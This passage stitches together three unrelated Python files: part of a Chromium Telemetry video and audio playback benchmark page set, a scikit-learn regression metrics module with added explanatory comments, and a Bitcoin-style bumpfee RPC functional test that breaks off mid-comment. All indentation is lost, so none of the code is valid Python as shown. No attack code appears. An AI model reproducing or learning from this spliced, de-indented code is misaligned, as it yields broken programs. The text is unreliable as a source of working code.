self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page22(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page22, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.webm',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page23(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page23, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp3&type=audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page24(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page24, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp4',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page25(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page25, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.webm',
page_set=page_set, labels=['is_4k'])
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page26(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page26, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.mp4',
page_set=page_set, labels=['is_4k'])
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page27(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page27, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.ogv',
page_set=page_set, labels=['is_4k'])
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page28(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page28, self).__init__(
url='file://tough_video_cases/audio_playback.html?id=single_audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.LoopSingleAudio(action_runner)
class Page29(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page29, self).__init__(
url='file://tough_video_cases/audio_playback.html?id=mixed_audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.LoopMixedAudio(action_runner)
class Page30(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page30, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.vp9.webm',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page31(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page31, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.vp9.webm',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page32(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page32, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080_vp9.webm',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page33(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page33, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080_vp9.webm',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page34(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page34, self).__init__(
url='file://tough_video_cases/video.html?src=crowd720_vp9.webm',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page35(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page35, self).__init__(
url='file://tough_video_cases/video.html?src=crowd720_vp9.webm',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page36(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page36, self).__init__(
url=('file://tough_video_cases/video.html?src='
'smpte_3840x2160_60fps_vp9.webm'),
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner,
action_timeout_in_seconds=120)
class Page37(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page37, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080_vp9.webm&canvas=true',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page38(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page38, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp4&canvas=true',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page39(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page39, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.webm&canvas=true',
page_set=page_set, labels=['is_4k'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page40(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page40, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080.ogv&canvas=true',
page_set=page_set)
self.add_browser_metrics = True
self.is_50fps = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class ToughVideoCasesPageSet(story.StorySet):
"""
  Description: Video Stack Perf benchmark that reports time_to_play.
"""
def __init__(self):
super(ToughVideoCasesPageSet, self).__init__(
cloud_storage_bucket=story.PARTNER_BUCKET)
self.AddStory(Page1(self))
self.AddStory(Page2(self))
self.AddStory(Page3(self))
self.AddStory(Page4(self))
self.AddStory(Page5(self))
self.AddStory(Page6(self))
self.AddStory(Page7(self))
self.AddStory(Page8(self))
self.AddStory(Page9(self))
self.AddStory(Page10(self))
self.AddStory(Page11(self))
self.AddStory(Page12(self))
self.AddStory(Page13(self))
self.AddStory(Page14(self))
self.AddStory(Page15(self))
self.AddStory(Page16(self))
self.AddStory(Page17(self))
self.AddStory(Page18(self))
self.AddStory(Page30(self))
self.AddStory(Page32(self))
self.AddStory(Page34(self))
self.AddStory(Page36(self))
self.AddStory(Page37(self))
self.AddStory(Page38(self))
self.AddStory(Page39(self))
self.AddStory(Page40(self))
class ToughVideoCasesExtraPageSet(story.StorySet):
"""
  Description: Video Stack Perf benchmark that doesn't report time_to_play.
"""
def __init__(self):
super(ToughVideoCasesExtraPageSet, self).__init__(
cloud_storage_bucket=story.PARTNER_BUCKET)
self.AddStory(Page19(self))
self.AddStory(Page20(self))
self.AddStory(Page21(self))
self.AddStory(Page22(self))
self.AddStory(Page23(self))
self.AddStory(Page24(self))
self.AddStory(Page25(self))
self.AddStory(Page26(self))
self.AddStory(Page27(self))
self.AddStory(Page28(self))
self.AddStory(Page29(self))
self.AddStory(Page31(self))
self.AddStory(Page33(self))
self.AddStory(Page35(self))
"""Metrics to assess performance on regression task
Functions named as ``*_score`` return a scalar value to maximize: the higher
the better
Function named as ``*_error`` or ``*_loss`` return a scalar value to minimize:
the lower the better
"""
# Authors: Alexandre Gramfort <[email protected]>
# Mathieu Blondel <[email protected]>
# Olivier Grisel <[email protected]>
# Arnaud Joly <[email protected]>
# Jochen Wersdorfer <[email protected]>
# Lars Buitinck <[email protected]>
# Joel Nothman <[email protected]>
# Noel Dawe <[email protected]>
# Manoj Kumar <[email protected]>
# Michael Eickenberg <[email protected]>
# Konstantin Shmelkov <[email protected]>
# License: BSD 3 clause
from __future__ import division
import numpy as np
from ..utils.validation import check_array, check_consistent_length
from ..utils.validation import column_or_1d
import warnings
__ALL__ = [
"mean_absolute_error",
"mean_squared_error",
"median_absolute_error",
"r2_score",
"explained_variance_score"
]
def _check_reg_targets(y_true, y_pred, multioutput):
"""Check that y_true and y_pred belong to the same regression task
Parameters
----------
y_true : array-like,
y_pred : array-like,
    multioutput : array-like or string in ['raw_values', 'uniform_average',
        'variance_weighted'] or None
None is accepted due to backward compatibility of r2_score().
Returns
-------
    type_true : one of {'continuous', 'continuous-multioutput'}
The type of the true target data, as output by
'utils.multiclass.type_of_target'
y_true : array-like of shape = (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples, n_outputs)
Estimated target values.
    multioutput : array-like of shape = (n_outputs) or string in ['raw_values',
        'uniform_average', 'variance_weighted'] or None
Custom output weights if ``multioutput`` is array-like or
just the corresponding argument if ``multioutput`` is a
correct keyword.
"""
check_consistent_length(y_true, y_pred)
y_true = check_array(y_true, ensure_2d=False)
y_pred = check_array(y_pred, ensure_2d=False)
if y_true.ndim == 1:
y_true = y_true.reshape((-1, 1))
if y_pred.ndim == 1:
y_pred = y_pred.reshape((-1, 1))
if y_true.shape[1] != y_pred.shape[1]:
raise ValueError("y_true and y_pred have different number of output "
"({0}!={1})".format(y_true.shape[1], y_pred.shape[1]))
n_outputs = y_true.shape[1]
multioutput_options = (None, 'raw_values', 'uniform_average',
'variance_weighted')
if multioutput not in multioutput_options:
multioutput = check_array(multioutput, ensure_2d=False)
if n_outputs == 1:
raise ValueError("Custom weights are useful only in "
"multi-output cases.")
elif n_outputs != len(multioutput):
raise ValueError(("There must be equally many custom weights "
"(%d) as outputs (%d).") %
(len(multioutput), n_outputs))
y_type = 'continuous' if n_outputs == 1 else 'continuous-multioutput'
return y_type, y_true, y_pred, multioutput
def mean_absolute_error(y_true, y_pred,
sample_weight=None,
multioutput='uniform_average'):
"""Mean absolute error regression loss
Parameters
----------
y_true : array-like of shape = (n_samples) or (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples) or (n_samples, n_outputs)
Estimated target values.
sample_weight : array-like of shape = (n_samples), optional
Sample weights.
multioutput : string in ['raw_values', 'uniform_average']
or array-like of shape (n_outputs)
Defines aggregating of multiple output values.
Array-like value defines weights used to average errors.
'raw_values' :
Returns a full set of errors in case of multioutput input.
'uniform_average' :
Errors of all outputs are averaged with uniform weight.
Returns
-------
loss : float or ndarray of floats
If multioutput is 'raw_values', then mean absolute error is returned
for each output separately.
If multioutput is 'uniform_average' or an ndarray of weights, then the
weighted average of all output errors is returned.
MAE output is non-negative floating point. The best value is 0.0.
Examples
--------
>>> from sklearn.metrics import mean_absolute_error
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> mean_absolute_error(y_true, y_pred)
0.5
>>> y_true = [[0.5, 1], [-1, 1], [7, -6]]
>>> y_pred = [[0, 2], [-1, 2], [8, -5]]
>>> mean_absolute_error(y_true, y_pred)
0.75
>>> mean_absolute_error(y_true, y_pred, multioutput='raw_values')
array([ 0.5, 1. ])
>>> mean_absolute_error(y_true, y_pred, multioutput=[0.3, 0.7])
... # doctest: +ELLIPSIS
0.849...
"""
y_type, y_true, y_pred, multioutput = _check_reg_targets(
y_true, y_pred, multioutput)
output_errors = np.average(np.abs(y_pred - y_true),
weights=sample_weight, axis=0)
if multioutput == 'raw_values':
return output_errors
elif multioutput == 'uniform_average':
# pass None as weights to np.average: uniform mean
multioutput = None
return np.average(output_errors, weights=multioutput)
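# --- Illustrative note (not part of the original module) ---
# With multioutput=[0.3, 0.7] in the docstring example above, the per-output
# errors are [0.5, 1.0], and np.average combines them as a weighted mean:
# (0.3 * 0.5 + 0.7 * 1.0) / (0.3 + 0.7) = 0.85, matching the 0.849... doctest.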
def mean_squared_error(y_true, y_pred,
sample_weight=None,
multioutput='uniform_average'):
"""Mean squared error regression loss
Parameters
----------
y_true : array-like of shape = (n_samples) or (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples) or (n_samples, n_outputs)
Estimated target values.
sample_weight : array-like of shape = (n_samples), optional
Sample weights.
multioutput : string in ['raw_values', 'uniform_average']
or array-like of shape (n_outputs)
Defines aggregating of multiple output values.
Array-like value defines weights used to average errors.
'raw_values' :
Returns a full set of errors in case of multioutput input.
'uniform_average' :
Errors of all outputs are averaged with uniform weight.
Returns
-------
loss : float or ndarray of floats
A non-negative floating point value (the best value is 0.0), or an
array of floating point values, one for each individual target.
Examples
--------
>>> from sklearn.metrics import mean_squared_error
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> mean_squared_error(y_true, y_pred)
0.375
>>> y_true = [[0.5, 1],[-1, 1],[7, -6]]
>>> y_pred = [[0, 2],[-1, 2],[8, -5]]
>>> mean_squared_error(y_true, y_pred) # doctest: +ELLIPSIS
0.708...
>>> mean_squared_error(y_true, y_pred, multioutput='raw_values')
... # doctest: +ELLIPSIS
array([ 0.416..., 1. ])
>>> mean_squared_error(y_true, y_pred, multioutput=[0.3, 0.7])
... # doctest: +ELLIPSIS
0.824...
"""
y_type, y_true, y_pred, multioutput = _check_reg_targets(
y_true, y_pred, multioutput)
output_errors = np.average((y_true - y_pred) ** 2, axis=0,
weights=sample_weight)
if multioutput == 'raw_values':
return output_errors
elif multioutput == 'uniform_average':
# pass None as weights to np.average: uniform mean
multioutput = None
return np.average(output_errors, weights=multioutput)
def median_absolute_error(y_true, y_pred):
"""Median absolute error regression loss
Parameters
----------
y_true : array-like of shape = (n_samples)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples)
Estimated target values.
Returns
-------
loss : float
A positive floating point value (the best value is 0.0).
Examples
--------
>>> from sklearn.metrics import median_absolute_error
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> median_absolute_error(y_true, y_pred)
0.5
"""
y_type, y_true, y_pred, _ = _check_reg_targets(y_true, y_pred,
'uniform_average')
if y_type == 'continuous-multioutput':
raise ValueError("Multioutput not supported in median_absolute_error")
return np.median(np.abs(y_pred - y_true))
def explained_variance_score(y_true, y_pred,
sample_weight=None,
multioutput='uniform_average'):
"""Explained variance regression score function
Best possible score is 1.0, lower values are worse.
Parameters
----------
y_true : array-like of shape = (n_samples) or (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples) or (n_samples, n_outputs)
Estimated target values.
sample_weight : array-like of shape = (n_samples), optional
Sample weights.
multioutput : string in ['raw_values', 'uniform_average', \
'variance_weighted'] or array-like of shape (n_outputs)
Defines aggregating of multiple output scores.
Array-like value defines weights used to average scores.
'raw_values' :
Returns a full set of scores in case of multioutput input.
'uniform_average' :
Scores of all outputs are averaged with uniform weight.
'variance_weighted' :
Scores of all outputs are averaged, weighted by the variances
of each individual output.
Returns
-------
score : float or ndarray of floats
The explained variance or ndarray if 'multioutput' is 'raw_values'.
Notes
-----
This is not a symmetric function.
Examples
--------
>>> from sklearn.metrics import explained_variance_score
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> explained_variance_score(y_true, y_pred) # doctest: +ELLIPSIS
0.957...
>>> y_true = [[0.5, 1], [-1, 1], [7, -6]]
>>> y_pred = [[0, 2], [-1, 2], [8, -5]]
>>> explained_variance_score(y_true, y_pred, multioutput='uniform_average')
... # doctest: +ELLIPSIS
0.983...
"""
y_type, y_true, y_pred, multioutput = _check_reg_targets(
y_true, y_pred, multioutput)
y_diff_avg = np.average(y_true - y_pred, weights=sample_weight, axis=0)
numerator = np.average((y_true - y_pred - y_diff_avg) ** 2,
weights=sample_weight, axis=0)
y_true_avg = np.average(y_true, weights=sample_weight, axis=0)
denominator = np.average((y_true - y_true_avg) ** 2,
weights=sample_weight, axis=0)
nonzero_numerator = numerator != 0
nonzero_denominator = denominator != 0
valid_score = nonzero_numerator & nonzero_denominator
output_scores = np.ones(y_true.shape[1])
output_scores[valid_score] = 1 - (numerator[valid_score] /
denominator[valid_score])
output_scores[nonzero_numerator & ~nonzero_denominator] = 0.
if multioutput == 'raw_values':
# return scores individually
return output_scores
elif multioutput == 'uniform_average':
        # passing None as weights to np.average results in a uniform mean
avg_weights = None
elif multioutput == 'variance_weighted':
avg_weights = denominator
else:
avg_weights = multioutput
return np.average(output_scores, weights=avg_weights)
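# --- Illustrative sketch (not part of the original module) ---
# Unlike r2_score below, explained_variance_score subtracts the mean residual
# (y_diff_avg), so a constant offset in the predictions is not penalised: a
# biased but perfectly correlated prediction still scores 1.0 here while R^2
# drops.
def _example_explained_variance_vs_r2():
    y_true = [1.0, 2.0, 3.0, 4.0]
    y_pred = [2.0, 3.0, 4.0, 5.0]  # same trend, shifted by +1
    ev = explained_variance_score(y_true, y_pred)                 # 1.0
    r2 = r2_score(y_true, y_pred, multioutput='uniform_average')  # 0.2
    return ev, r2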
def r2_score(y_true, y_pred,
sample_weight=None,
multioutput=None):
"""R^2 (coefficient of determination) regression score function.
Best possible score is 1.0, lower values are worse.
Parameters
----------
y_true : array-like of shape = (n_samples) or (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples) or (n_samples, n_outputs)
Estimated target values.
sample_weight : array-like of shape = (n_samples), optional
Sample weights.
multioutput : string in ['raw_values', 'uniform_average',
'variance_weighted'] or None or array-like of shape (n_outputs)
Defines aggregating of multiple output scores.
Array-like value defines weights used to average scores.
        Default value corresponds to 'variance_weighted', but it
        will be changed to 'uniform_average' in a future version.
'raw_values' :
Returns a full set of scores in case of multioutput input.
'uniform_average' :
Scores of all outputs are averaged with uniform weight.
'variance_weighted' :
Scores of all outputs are averaged, weighted by the variances
of each individual output.
Returns
-------
z : float or ndarray of floats
The R^2 score or ndarray of scores if 'multioutput' is
'raw_values'.
Notes
-----
This is not a symmetric function.
Unlike most other scores, R^2 score may be negative (it need not actually
be the square of a quantity R).
References
----------
.. [1] `Wikipedia entry on the Coefficient of determination
<http://en.wikipedia.org/wiki/Coefficient_of_determination>`_
Examples
--------
>>> from sklearn.metrics import r2_score
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> r2_score(y_true, y_pred) # doctest: +ELLIPSIS
0.948...
>>> y_true = [[0.5, 1], [-1, 1], [7, -6]]
>>> y_pred = [[0, 2], [-1, 2], [8, -5]]
>>> r2_score(y_true, y_pred, multioutput='variance_weighted') # doctest: +ELLIPSIS
0.938...
"""
y_type, y_true, y_pred, multioutput = _check_reg_targets(
y_true, y_pred, multioutput)
if sample_weight is not None:
sample_weight = column_or_1d(sample_weight)
weight = sample_weight[:, np.newaxis]
else:
weight = 1.
numerator = (weight * (y_true - y_pred) ** 2).sum(axis=0,
dtype=np.float64)
denominator = (weight * (y_true - np.average(
y_true, axis=0, weights=sample_weight)) ** 2).sum(axis=0,
dtype=np.float64)
nonzero_denominator = denominator != 0
nonzero_numerator = numerator != 0
valid_score = nonzero_denominator & nonzero_numerator
output_scores = np.ones([y_true.shape[1]])
output_scores[valid_score] = 1 - (numerator[valid_score] /
denominator[valid_score])
    # arbitrarily set to zero to avoid -inf scores; having a constant
    # y_true is not interesting for scoring a regression anyway
output_scores[nonzero_numerator & ~nonzero_denominator] = 0.
if multioutput is None:
# @FIXME change in 0.18
warnings.warn("Default 'multioutput' behavior now corresponds to "
"'variance_weighted' value, it will be changed "
"to 'uniform_average' in 0.18.",
DeprecationWarning)
multioutput = 'variance_weighted'
if multioutput == 'raw_values':
# return scores individually
return output_scores
elif multioutput == 'uniform_average':
        # passing None as weights results in a uniform mean
avg_weights = None
elif multioutput == 'variance_weighted':
avg_weights = denominator
        # avoid failing on constant y or one-element arrays
if not np.any(nonzero_denominator):
if not np.any(nonzero_numerator):
return 1.0
else:
return 0.0
else:
avg_weights = multioutput
return np.average(output_scores, weights=avg_weights)
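# --- Illustrative sketch (not part of the original module) ---
# The constant-target edge case handled above: when y_true has zero variance
# the usual R^2 denominator is zero, so instead of returning -inf the score is
# pinned to 0.0, or to 1.0 when the predictions match that constant exactly.
def _example_r2_constant_target():
    assert r2_score([2, 2, 2], [2, 2, 2], multioutput='uniform_average') == 1.0
    assert r2_score([2, 2, 2], [2, 2, 3], multioutput='uniform_average') == 0.0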
#!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the bumpfee RPC.
Verifies that the bumpfee RPC creates replacement transactions successfully when
its preconditions are met, and returns appropriate errors in other cases.
This module consists of around a dozen individual test cases implemented in the
top-level functions named as test_<test_case_description>. The test functions
can be disabled or reordered if needed for debugging. If new test cases are
added in the future, they should try to follow the same convention and not
make assumptions about execution order.
"""
from segwit import send_to_witness
from test_framework.test_framework import BitcoinTestFramework
from test_framework import blocktools
from test_framework.mininode import CTransaction
from test_framework.util import *
import io
# Sequence number that is BIP 125 opt-in and BIP 68-compliant
BIP125_SEQUENCE_NUMBER = 0xfffffffd
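# (Clarifying note, not in the original test.) 0xfffffffd opts in to BIP 125
# replace-by-fee because it is below 0xfffffffe, and its high bit is set, which
# per BIP 68 disables relative lock-time enforcement for the input.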
WALLET_PASSPHRASE = "test"
WALLET_PASSPHRASE_TIMEOUT = 3600
class BumpFeeTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 2
self.setup_clean_chain = True
def setup_network(self, split=False):
extra_args = [["-prematurewitness", "-walletprematurewitness", "-walletrbf={}".format(i)]
for i in range(self.num_nodes)]
self.nodes = self.start_nodes(self.num_nodes, self.options.tmpdir, extra_args)
# Encrypt wallet for test_locked_wallet_fails test
self.nodes[1].encryptwallet(WALLET_PASSPHRASE)
self.bitcoind_processes[1].wait()
self.nodes[1] = self.start_node(1, self.options.tmpdir, extra_args[1])
self.nodes[1].walletpassphrase(WALLET_PASSPHRASE, WALLET_PASSPHRASE_TIMEOUT)
connect_nodes_bi(self.nodes, 0, 1)
self.sync_all()
def run_test(self):
peer_node, rbf_node = self.nodes
rbf_node_address = rbf_node.getnewaddress()
        # fund rbf node with 25 coins of 0.1 GAME (10,000,000 satoshis each)
self.log.info("Mining blocks...")
peer_node.generate(110)
self.sync_all()
for i in range(25):
peer_node.sendtoaddress(rbf_node_address, 0.1)
self.sync_all()
peer_node.generate(1)
self.sync_all()
assert_equal(rbf_node.getbalance(), Decimal("2.5"))
self.log.info("Running tests")
dest_address = peer_node.getnewaddress()
test_simple_bumpfee_succeeds(rbf_node, peer_node, dest_address)
test_segwit_bumpfee_succeeds(rbf_node, dest_address)
test_nonrbf_bumpfee_fails(peer_node, dest_address)
test_notmine_bumpfee_fails(rbf_node, peer_node, dest_address)
test_bumpfee_with_descendant_fails(rbf_node, rbf_node_address, dest_address)
test_small_output_fails(rbf_node, dest_address)
test_dust_to_fee(rbf_node, dest_address)
test_settxfee(rbf_node, dest_address)
test_rebumping(rbf_node, dest_address)
test_rebumping_not_replaceable(rbf_node, dest_address)
test_unconfirmed_not_spendable(rbf_node, rbf_node_address)
test_bumpfee_metadata(rbf_node, dest_address)
test_locked_wallet_fails(rbf_node, dest_address)
self.log.info("Success")
def test_simple_bumpfee_succeeds(rbf_node, peer_node, dest_address):
rbfid = spend_one_input(rbf_node, dest_address)
rbftx = rbf_node.gettransaction(rbfid)
sync_mempools((rbf_node, peer_node))
assert rbfid in rbf_node.getrawmempool() and rbfid in peer_node.getrawmempool()
bumped_tx = rbf_node.bumpfee(rbfid)
assert_equal(bumped_tx["errors"], [])
assert bumped_tx["fee"] - abs(rbftx["fee"]) > 0
    # check that bumped_tx propagates, the original tx was evicted and has a wallet conflict
sync_mempools((rbf_node, peer_node))
assert bumped_tx["txid"] in rbf_node.getrawmempool()
assert bumped_tx["txid"] in peer_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
assert rbfid not in peer_node.getrawmempool()
oldwtx = rbf_node.gettransaction(rbfid)
assert len(oldwtx["walletconflicts"]) > 0
# check wallet transaction replaces and replaced_by values
bumpedwtx = rbf_node.gettransaction(bumped_tx["txid"])
assert_equal(oldwtx["replaced_by_txid"], bumped_tx["txid"])
assert_equal(bumpedwtx["replaces_txid"], rbfid)
def test_segwit_bumpfee_succeeds(rbf_node, dest_address):
# Create a transaction with segwit output, then create an RBF transaction
# which spends it, and make sure bumpfee can be called on it.
segwit_in = next(u for u in rbf_node.listunspent() if u["amount"] == Decimal("0.1"))
segwit_out = rbf_node.validateaddress(rbf_node.getnewaddress())
rbf_node.addwitnessaddress(segwit_out["address"])
segwitid = send_to_witness(
use_p2wsh=False,
node=rbf_node,
utxo=segwit_in,
pubkey=segwit_out["pubkey"],
encode_p2sh=False,
amount=Decimal("0.09"),
sign=True)
rbfraw = rbf_node.createrawtransaction([{
'txid': segwitid,
'vout': 0,
"sequence": BIP125_SEQUENCE_NUMBER
}], {dest_address: Decimal("0.05"),
rbf_node.getrawchangeaddress(): Decimal("0.03")})
rbfsigned = rbf_node.signrawtransaction(rbfraw)
rbfid = rbf_node.sendrawtransaction(rbfsigned["hex"])
assert rbfid in rbf_node.getrawmempool()
bumped_tx = rbf_node.bumpfee(rbfid)
assert bumped_tx["txid"] in rbf_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
def test_nonrbf_bumpfee_fails(peer_node, dest_address):
    # cannot replace a non-RBF transaction (from a node which did not enable RBF)
not_rbfid = peer_node.sendtoaddress(dest_address, Decimal("0.090000"))
assert_raises_jsonrpc(-4, "not BIP 125 replaceable", peer_node.bumpfee, not_rbfid)
def test_notmine_bumpfee_fails(rbf_node, peer_node, dest_address):
# cannot bump fee unless the tx has only inputs that we own.
# here, the rbftx has a peer_node coin and then adds a rbf_node input
# Note that this test depends upon the RPC code checking input ownership prior to change outputs
# (since it can't use fundrawtransaction, it lacks a proper change output)
utxos = [node.listunspent()[-1] for node in (rbf_node, peer_node)]
inputs = [{
"txid": utxo["txid"],
"vout": utxo["vout"],
"address": utxo["address"],
"sequence": BIP125_SEQUENCE_NUMBER
} for utxo in utxos]
output_val = sum(utxo["amount"] for utxo in utxos) - Decimal("0.1")
rawtx = rbf_node.createrawtransaction(inputs, {dest_address: output_val})
signedtx = rbf_node.signrawtransaction(rawtx)
signedtx = peer_node.signrawtransaction(signedtx["hex"])
rbfid = rbf_node.sendrawtransaction(signedtx["hex"])
assert_raises_jsonrpc(-4, "Transaction contains inputs that don't belong to this wallet",
rbf_node.bumpfee, rbfid)
def test_bumpfee_with_descendant_fails(rbf_node, rbf_node_address, dest_address):
# cannot bump fee if the transaction has a descendant
# parent is send-to-self, so we don't have to check which output is change when creating the child tx
parent_id = spend_one_input(rbf_node, rbf_node_address)
tx = rbf_node.createrawtransaction([{"txid": parent_id, "vout": 0}], {dest_address: 0.020000})
tx = rbf_node.signrawtransaction(tx)
txid = rbf_node.sendrawtransaction(tx["hex"])
assert_raises_jsonrpc(-8, "Transaction has descendants in the wallet", rbf_node.bumpfee, parent_id)
def test_small_output_fails(rbf_node, dest_address):
# cannot bump fee with a too-small output
rbfid = spend_one_input(rbf_node, dest_address)
rbf_node.bumpfee(rbfid, {"totalFee": 5000000})
rbfid = spend_one_input(rbf_node, dest_address)
assert_raises_jsonrpc(-4, "Change output is too small", rbf_node.bumpfee, rbfid, {"totalFee": 5000001})
def test_dust_to_fee(rbf_node, dest_address):
# check that if output is reduced to dust, it will be converted to fee
    # the bumped tx sets totalFee=4,990,000 satoshis (0.0499), which would leave only
    # 0.0001 as change; that is dust, so it is dropped and the final fee becomes 0.05
rbfid = spend_one_input(rbf_node, dest_address)
fulltx = rbf_node.getrawtransaction(rbfid, 1)
bumped_tx = rbf_node.bumpfee(rbfid, {"totalFee": 4990000})
full_bumped_tx = rbf_node.getrawtransaction(bumped_tx["txid"], 1)
assert_equal(bumped_tx["fee"], Decimal("0.050000"))
assert_equal(len(fulltx["vout"]), 2)
    assert_equal(len(full_bumped_tx["vout"]), 1)  # change output is eliminated
def test_settxfee(rbf_node, dest_address):
# check that bumpfee reacts correctly to the use of settxfee (paytxfee)
rbfid = spend_one_input(rbf_node, dest_address)
requested_feerate = Decimal("0.025000")
rbf_node.settxfee(requested_feerate)
bumped_tx = rbf_node.bumpfee(rbfid)
actual_feerate = bumped_tx["fee"] * 1000 / rbf_node.getrawtransaction(bumped_tx["txid"], True)["size"]
# Assert that the difference between the requested feerate and the actual
# feerate of the bumped transaction is small.
assert_greater_than(Decimal("0.001000"), abs(requested_feerate - actual_feerate))
rbf_node.settxfee(Decimal("0.00000000")) # unset paytxfee
def test_rebumping(rbf_node, dest_address):
# check that re-bumping the original tx fails, but bumping the bumper succeeds
rbfid = spend_one_input(rbf_node, dest_address)
bumped = rbf_node.bumpfee(rbfid, {"totalFee": 200000})
assert_raises_jsonrpc(-4, "already bumped", rbf_node.bumpfee, rbfid, {"totalFee": 300000})
rbf_node.bumpfee(bumped["txid"], {"totalFee": 300000})
def test_rebumping_not_replaceable(rbf_node, dest_address):
# check that re-bumping a non-replaceable bump tx fails
rbfid = spend_one_input(rbf_node, dest_address)
bumped = rbf_node.bumpfee(rbfid, {"totalFee": 1000000, "replaceable": False})
assert_raises_jsonrpc(-4, "Transaction is not BIP 125 replaceable", rbf_node.bumpfee, bumped["txid"],
{"totalFee": 2000000})
def test_unconfirmed_not_spendable(rbf_node, rbf_node_address):
# check that unconfirmed outputs from bumped transactions are not spendable
rbfid = spend_one_input(rbf_node, rbf_node_address)
rbftx = rbf_node.gettransaction(rbfid)["hex"]
assert rbfid in rbf_node.getrawmempool()
bumpid = rbf_node.bumpfee(rbfid)["txid"]
assert bumpid in rbf_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
# check that outputs from the bump transaction are not spendable
# due to the replaces_txid check in CWallet::AvailableCoins
assert_equal([t for t in rbf_node.listunspent(minconf=0, include_unsafe=False) if t["txid"] == bumpid], [])
# submit a block with the rbf tx to clear the bump tx out of the mempool,
# then call abandon to make sure the wallet doesn't attempt to resubmit the
# bump tx, then invalidate the block so the rbf tx will be put back in the
